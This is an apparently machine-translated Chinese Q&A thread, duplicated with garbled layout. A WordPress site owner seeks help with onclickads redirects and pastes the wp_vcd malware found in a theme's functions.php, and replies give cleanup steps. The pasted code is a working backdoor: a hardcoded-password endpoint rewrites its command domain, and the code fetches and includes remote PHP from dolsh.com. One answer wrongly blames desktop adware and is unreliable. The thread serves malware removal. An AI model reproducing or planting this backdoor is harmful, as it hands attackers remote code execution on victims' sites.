WordPress 网站已将我的链接重定向到 onclickads 网站
WordPress site have been redirect my links to onclickads website
不知道这是不是onlickads的代码
每次当我点击我网站上的一些链接时,它都会将我重定向到 onclickads.com 个链接。
每次我在我的主题上删除这段代码时 functions.php 它会一次又一次地生成这段代码。当我检查主题函数的原始文件时,这段代码不包括在内。
<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'f82a07ebbdf814988becaa9c78ce0ffb'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code8\.php/i',$file,$matcholddomain))
{
$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}
die("");
}
if ( ! function_exists( 'w1p_te1mp_se1tup' ) ) {
$path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];
if ( ! is_404() && stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
if($tmpcontent = @file_get_contents("http://www.dolsh.com/code8.php?i=".$path))
{
function w1p_te1mp_se1tup($phpCode) {
$tmpfname = tempnam(sys_get_temp_dir(), "w1p_te1mp_se1tup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, "<?php\n" . $phpCode);
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}
extract(w1p_te1mp_se1tup($tmpcontent));
}
}
}
?>
任何人都可以建议如何操作或 tuts 以删除我网站上的恶意软件,
谢谢。
此 onclickads.com 重定向通常是由安装在您计算机上的广告软件引起的。这些广告软件程序与您从 Internet 下载的其他免费软件捆绑在一起。
可能您不需要安装新版本,您可以通过以下步骤从您的站点中删除此类警告。
要删除 onclickads.com 重定向,请按照下列步骤操作:
1) 从您的文件中删除了不需要的代码。
2) 从 Windows
卸载恶意程序
3) 在您的系统上使用安全软件,并在您的 WordPress 中使用安全插件,例如 Anti-spam or Wordfence
仍然执行此步骤后,仍然没有任何效果,那么您可以安装新版本并使用新版本安装安全插件,以避免将来使用时被黑客入侵。
希望这对您有所帮助。谢谢
要完全删除代码,如果您使用的是子主题,则必须同时将其从父主题中删除
我解决问题的方法:
- 在
wp-include
目录中,删除wp-vcd.php
和class.wp.php
个文件
- 在
wp-include
目录中,打开post.php
并删除Malware
添加的第一个php
标签
- 打开主题的
functions.php
文件,删除上面的代码
这是我在为我的受攻击网站寻找解决方案后发现的如何修复此恶意软件攻击的完整详细解决方案
https://github.com/rakshitshah94/wordpress-wp-vcd-malware-attack-solution
不知道这是不是onlickads的代码 每次当我点击我网站上的一些链接时,它都会将我重定向到 onclickads.com 个链接。
每次我在我的主题上删除这段代码时 functions.php 它会一次又一次地生成这段代码。当我检查主题函数的原始文件时,这段代码不包括在内。
<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'f82a07ebbdf814988becaa9c78ce0ffb'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code8\.php/i',$file,$matcholddomain))
{
$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}
die("");
}
if ( ! function_exists( 'w1p_te1mp_se1tup' ) ) {
$path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];
if ( ! is_404() && stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
if($tmpcontent = @file_get_contents("http://www.dolsh.com/code8.php?i=".$path))
{
function w1p_te1mp_se1tup($phpCode) {
$tmpfname = tempnam(sys_get_temp_dir(), "w1p_te1mp_se1tup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, "<?php\n" . $phpCode);
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}
extract(w1p_te1mp_se1tup($tmpcontent));
}
}
}
?>
任何人都可以建议如何操作或 tuts 以删除我网站上的恶意软件,
谢谢。
此 onclickads.com 重定向通常是由安装在您计算机上的广告软件引起的。这些广告软件程序与您从 Internet 下载的其他免费软件捆绑在一起。
可能您不需要安装新版本,您可以通过以下步骤从您的站点中删除此类警告。
要删除 onclickads.com 重定向,请按照下列步骤操作:
1) 从您的文件中删除了不需要的代码。
2) 从 Windows
卸载恶意程序3) 在您的系统上使用安全软件,并在您的 WordPress 中使用安全插件,例如 Anti-spam or Wordfence
仍然执行此步骤后,仍然没有任何效果,那么您可以安装新版本并使用新版本安装安全插件,以避免将来使用时被黑客入侵。
希望这对您有所帮助。谢谢
要完全删除代码,如果您使用的是子主题,则必须同时将其从父主题中删除
我解决问题的方法:
- 在
wp-include
目录中,删除wp-vcd.php
和class.wp.php
个文件 - 在
wp-include
目录中,打开post.php
并删除Malware
添加的第一个 - 打开主题的
functions.php
文件,删除上面的代码
php
标签
这是我在为我的受攻击网站寻找解决方案后发现的如何修复此恶意软件攻击的完整详细解决方案
https://github.com/rakshitshah94/wordpress-wp-vcd-malware-attack-solution